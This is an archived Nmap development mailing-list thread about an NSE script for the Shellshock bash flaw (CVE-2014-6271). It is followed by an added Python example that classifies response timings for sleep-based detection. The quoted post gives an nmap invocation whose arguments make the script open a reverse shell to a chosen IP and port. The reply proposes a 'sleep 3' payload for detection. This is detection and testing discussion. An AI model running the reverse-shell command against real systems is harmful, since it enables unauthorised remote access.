Nmap Development mailing list archives
Re: Shell Shock NSE Script (CVE-2014-6271)
From: Dean Pierce <pierce403 () gmail com>
Date: Mon, 29 Sep 2014 13:07:27 -0700
I feel like having a payload of something like "sleep 3" would make more sense than the various pingback methods. Then you just wait to see if the request takes ~3 seconds, rather than having to set up a listener on some publicly exposed server.

- DEAN

On Fri, Sep 26, 2014 at 1:45 AM, Paul Amar <paul () sensepost com> wrote:
> Hi list,
>
> I created an NSE script for the Shell Shock vulnerability (CVE-2014-6271).
> I tested the script with Pentesterlab's VM located here: files.pentesterlab.com/cve-2014-6271/cve-2014-6271.iso.
>
> This script detects if the host is vulnerable. If so, you get a reverse shell by specifying the good arguments.
>
> E.g.
> ./nmap -p80 --script http-vuln-cve-2014-6271.nse --script-args http-vuln-cve-2014-6271.remoteIp=<your-ip>,http-vuln-cve-2014-6271.remotePort=<your-port>,http-vuln-cve-2014-6271.uri=/cgi-bin/status <ip> -d
>
> Feel free if you have any feedback,
> Paul
> _______________________________________________
> Sent through the dev mailing list
> http://nmap.org/mailman/listinfo/dev
> Archived at http://seclists.org/nmap-dev/
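The timing approach suggested in this message depends on telling a sleep-induced delay from a host that is simply slow. The following is an added example, not code from the thread or from Nmap: it classifies already-measured timings and sends no requests, and the function name, the tolerance and the sample timings are constructed assumptions.

```python
"""Decide whether a delayed response is attributable to a requested sleep.

Operates on measured timings only (constructed samples below).
"""
from statistics import median


def classify_delay(baseline, probes, tolerance=0.75):
    """baseline: elapsed seconds for unmodified requests.
    probes: {requested_sleep_seconds: [elapsed seconds, ...]}.
    Returns 'delayed', 'not-delayed' or 'inconclusive'."""
    if len(baseline) < 3 or len(probes) < 2:
        return "inconclusive"      # need a baseline and two distinct sleep values
    base = median(baseline)
    jitter = max(baseline) - min(baseline)
    if jitter >= min(probes):
        return "inconclusive"      # normal variation could hide or fake the sleep
    matched = 0
    for requested, samples in probes.items():
        if not samples:
            return "inconclusive"
        extra = median(samples) - base   # time added on top of a normal response
        if abs(extra - requested) <= tolerance:
            matched += 1
        elif extra < requested - tolerance:
            return "not-delayed"   # answered sooner than the sleep would allow
    # Every requested value must be reflected, so the delay scales with the input.
    return "delayed" if matched == len(probes) else "inconclusive"


# Constructed timings (seconds), not measurements from any real host.
FAST_HOST = {"baseline": [0.21, 0.19, 0.25],
             "probes": {3: [3.22, 3.18], 6: [6.24, 6.20]}}
# Always takes about 3 s: a bare "did it take ~3 seconds?" check would misfire.
SLOW_HOST = {"baseline": [3.1, 2.9, 3.3],
             "probes": {3: [3.0, 3.2], 6: [3.1, 3.3]}}
# One baseline request stalled, so a 3 s difference proves nothing.
NOISY_HOST = {"baseline": [0.2, 4.0, 0.3],
              "probes": {3: [3.3, 3.1], 6: [6.2, 6.4]}}

if __name__ == "__main__":
    for name, host in (("fast", FAST_HOST), ("slow", SLOW_HOST),
                       ("noisy", NOISY_HOST)):
        print(name, classify_delay(host["baseline"], host["probes"]))
```

Requiring two different sleep values and a quiet baseline is what separates a real delay from a slow CGI endpoint or a congested link.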